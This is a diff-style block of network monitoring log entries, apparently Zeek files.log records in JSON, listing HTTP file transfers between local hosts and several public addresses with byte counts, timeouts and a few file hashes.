+{"ts":"2018-08-03T23:37:54.500388Z","fuid":"FHjTCJ2kvSBTOTMed5","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CCZatZes3LCREG6o5"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":7300,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.500388Z","fuid":"F2AopE5I25ExaCrm8","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C2KEcZ22C6wHNNyC1i"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.520650Z","fuid":"Fq2rJr3Gwv8jcyG6k2","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C6Yr0O3ulsmPbzcsxc"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5840,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.520650Z","fuid":"F7u9PP1bc7UP9KgyZg","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CizCTn2ET630G9B9qa"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.117294Z","fuid":"F7KZP53h5ZQ1F7iTl9","tx_hosts":["104.16.13.8"],"rx_hosts":["192.168.0.51"],"conn_uids":["CdCWB33vuu7Bl4qahd"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":7000,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.455883Z","fuid":"FcLQ2bSbVs0ZIRuce","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["ChmBmO3vRWSavOULO7"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5840,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.471109Z","fuid":"FbR2OV3vhIorZwSXda","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CYrOcx4irVbyhotROi"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.481205Z","fuid":"Fcjye444ydo6RYa1Hl","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cn54uy4zbkxGhPK4S5"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.501463Z","fuid":"FXn0bo2ajZobXlABL8","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C5OrA63TkumwbusIye"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.501463Z","fuid":"FdrLNq34rGGwXGFAh","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CowuIWMN9znkYEJJj"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.511558Z","fuid":"Fl3ArYL8bRDwfC3o","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cs4BuH24aI8PcUWtJ8"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.511558Z","fuid":"Fy9g2XCLxyxl3667k","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CUxt5i4aM50iIckzLc"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.521702Z","fuid":"FJekSIcxzhGrOX836","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CF7UB528sTWQL3MRc7"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5840,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.521702Z","fuid":"FXAOzEQaXcikwKo12","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CSMYQt18o0hf78am65"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.466670Z","fuid":"FxoXwQ3KjHhUscFsc6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cp2NT1yeJvNXFz1Yh"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.491995Z","fuid":"FHEfG5d9un4tl6pPc","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CyJR0D1b4zUUzac8u4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.491995Z","fuid":"F5NgpS2NP1I2adwLJf","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C4PcrE2X8UG3P6zrY2"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.507195Z","fuid":"FFZnNg49KcYyVUVVp1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C2ITdv2M1jPKqVbDf9"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.522416Z","fuid":"FdKSSY3dBpIlvpRM89","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CiXzIa2TqBLeiF5VM8"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.522416Z","fuid":"F5sXvu4hqqZe3pnbMd","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CeM0Dh2bfxNixGjzD1"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.522416Z","fuid":"Fr03oZ2kVi5XN6Qos1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CTcDUf3oD3jYri3LY"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.562893Z","fuid":"FkOF3i34B0fxIdyN4e","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CtxrXJ2Zr6LmcjzzO7"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":653,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.460721Z","fuid":"F60bW22yzjh8TrWnjd","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CXgPlH2TofUFAL1NGl"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.460721Z","fuid":"FxZFo54toPwsNfWB71","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CAq0ij1WADiUg9ryXj"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.460721Z","fuid":"FxwMi24p64lcZPbXOb","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CRlBke4uqqdCtnkKld"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470832Z","fuid":"FbTR3n4JgObr3bhowb","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cr3Ea92SEufz37GbZ3"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.486072Z","fuid":"Fsq7Cw30crXnGWaKpk","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C6aNGE39L8fV3boqHe"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.506269Z","fuid":"FfMG3r3XbtBMcDTJGb","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CzvfudlFZP6wkrDY4"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.516380Z","fuid":"FNkApA2YKbVugKfVA4","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CSCOKH2FjsKdKMsGO8"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.536593Z","fuid":"FQaI3b3F1KC9tHDJ79","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["ClIQ53m5L8Zipdv97"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.536593Z","fuid":"Fbj2mt3qQf0GUnqvYi","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CLklGx3gVU0TWNFZHa"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.536593Z","fuid":"FNCsJhVGY97ElJ73","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CxTw6RbwWtKcO9mLl"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.602334Z","fuid":"FWbpCf1eU0ZZ1d5uZ2","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.112"],"conn_uids":["CDV9F63O0I8pyxPtB9"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"mime_type":"image/png","duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":1042,"total_bytes":73628,"missing_bytes":0,"overflow_bytes":0,"timedout":true,"md5":"865a0f466a1c805fd4cd61fc3ba661b0","sha1":"fc93721980f0c39ccc1e494215ebb12fa2f4a5ce","sha256":"624ca04174083cb09034c147528a401d4e74c760b89d36f73ec51af33d1810fe"} +{"ts":"2018-08-03T23:37:54.166459Z","fuid":"FfzQvR7sjBJgpkOGl","tx_hosts":["173.194.66.94"],"rx_hosts":["192.168.0.51"],"conn_uids":["C4k5HD2PTRIXaIorLf"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":625,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.469852Z","fuid":"F9MVHh1pKp5VH9Sota","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CFGkNp2ntKaAOM0zb4"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.485065Z","fuid":"FrxglN2m7TBufexjsj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C72hDL2pPLhyS0pscl"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505243Z","fuid":"F0nUf61iwRuuyq10I1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["ChGo5aJrD5f9UkYm6"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.520486Z","fuid":"FM6NsZ3Q0fRZ4DVkSe","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CrIm2kU7B6CLcZXh2"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.520486Z","fuid":"FmgHbj3Go6bowQtwO1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CV7ZI5O3rPbIn85q6"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.535626Z","fuid":"FS3QNw1YESsLpn0rs5","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CuoAt61JY8gigyS27"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.535626Z","fuid":"Fa5AW2pFpW6LsDvZ4","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C8nDod1FO0t6kdtQ21"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.657030Z","fuid":"FadXPx3PGTSBElM4fg","tx_hosts":["216.58.209.132"],"rx_hosts":["192.168.0.51"],"conn_uids":["CW4M5G4OgicvMhDgih"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.621240Z","fuid":"F3x2qxcwvsboV92ge","tx_hosts":["217.195.49.112"],"rx_hosts":["192.168.0.2"],"conn_uids":["Cb2gYz2wwAu5WkCK4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":false,"is_orig":true,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.656704Z","fuid":"FXg3963rHSUMgp5N5c","tx_hosts":["213.155.151.186"],"rx_hosts":["192.168.0.51"],"conn_uids":["CUvfJQr42rxmy7s9j"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":443,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.212417Z","fuid":"FV1HoC3pCZk7BCKzCe","tx_hosts":["192.168.0.54"],"rx_hosts":["192.168.0.1"],"conn_uids":["Ctm2US2RUr8xakJwv1"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":true,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.561372Z","fuid":"FcF6DfVWMLxB7gvZ3","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.146"],"conn_uids":["C1D7VZ1JAko2NO0G7j"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"mime_type":"text/html","duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":4917,"total_bytes":5426,"missing_bytes":0,"overflow_bytes":0,"timedout":true,"md5":"5395679e1f73ee43f64b659f665c177c","sha1":"4e847b86bcedf85e025d0e0ed66bc79cda1ea077","sha256":"b99331bd43363f52f0a66517dac020a39be3b13e4526e4c32964b059c433a886"} +{"ts":"2018-08-03T23:37:53.671261Z","fuid":"FZd1os4i9QlpKApQu8","tx_hosts":["162.159.248.192"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cmv5Xd1y83vcLNoeii"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":2800,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470016Z","fuid":"FVkrx24LXjZuEWCnee","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CnO50I3HFZ176lq54h"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470016Z","fuid":"Fqfk66DLCbYo80IYh","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CpyBuv40hIIFmSEU7d"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470016Z","fuid":"F7tvXv4laXGRi4vsGf","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CrJPa72Fo5cbfPly6f"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.500386Z","fuid":"FKf54gGNelIqNMUxa","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CWD38D4qQxlWxkHolk"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.500386Z","fuid":"Fen0732O6J2TnmGDEe","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cmnw3E4Zc09le3GoM1"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.500386Z","fuid":"F6BuZm2qp1cgDee4od","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CrPEy81PJBTQEnhkP"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.500386Z","fuid":"FHEm6m3HJ9PfUKAbu3","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CphkIqazfV6EyRWWa"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.515553Z","fuid":"FyoND43I3h8JOLC28e","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CKU7oE1e7cIjvoMti"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.525647Z","fuid":"FQT6Fh1nA89vyEquG5","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CKfVXrDK91wfGr3O4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.540799Z","fuid":"FFMpWy2yxqiPV2oz02","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CkhYm52HiwmMXpMBV7"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.555971Z","fuid":"F4B7zx2F6iJaPeXHLc","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CdW4AC438cNNuk32g7"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5272,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.662285Z","fuid":"F44ACS3hPpCQiXT3Mf","tx_hosts":["46.137.79.63"],"rx_hosts":["192.168.0.51"],"conn_uids":["CFpiY513STBkkf6vCa"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1277,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.210290Z","fuid":"FAviDw4FtE7n9pw48i","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.54"],"conn_uids":["CLUh8N1B82Q5FcD9i"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.210290Z","fuid":"FU9PWz2GDjtUvJep8h","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.54"],"conn_uids":["CGqecQ2j9IxyP0Epdi"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.208251Z","fuid":"FKNu8PTBE02WPJjuh","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.54"],"conn_uids":["CMUrWc2WwK5wzZvXpj"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.557125Z","fuid":"FdWYdI13WsYZeEWYo2","tx_hosts":["72.52.91.14"],"rx_hosts":["192.168.0.51"],"conn_uids":["Ctf4BnAKe3MFUsCcd"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.206443Z","fuid":"F1JSHC4OwCfDtPW24k","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.54"],"conn_uids":["C4iQke3yz07tzk38cj"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470481Z","fuid":"FMFXgs26a6IDRohef9","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CfDn1H1fECwSp205P5"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470481Z","fuid":"FNDkBRr6Sc1XPly5e","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cc4n3l2zpQN5o97JW6"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.470481Z","fuid":"FYgBtg355Q9DpXWZ7","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CPywxx3n7Jse2RNDZ"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.480624Z","fuid":"FligtU1bfS81AZPx8i","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cql5xc4dMEtWRA5kEi"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505930Z","fuid":"FxD92m1iAAs0nZz0f6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CPbH3D4WKvSZD37XU"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505930Z","fuid":"FyVtit2h8CFylKC8i1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CxZSwb48I9HIo6qvrj"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} 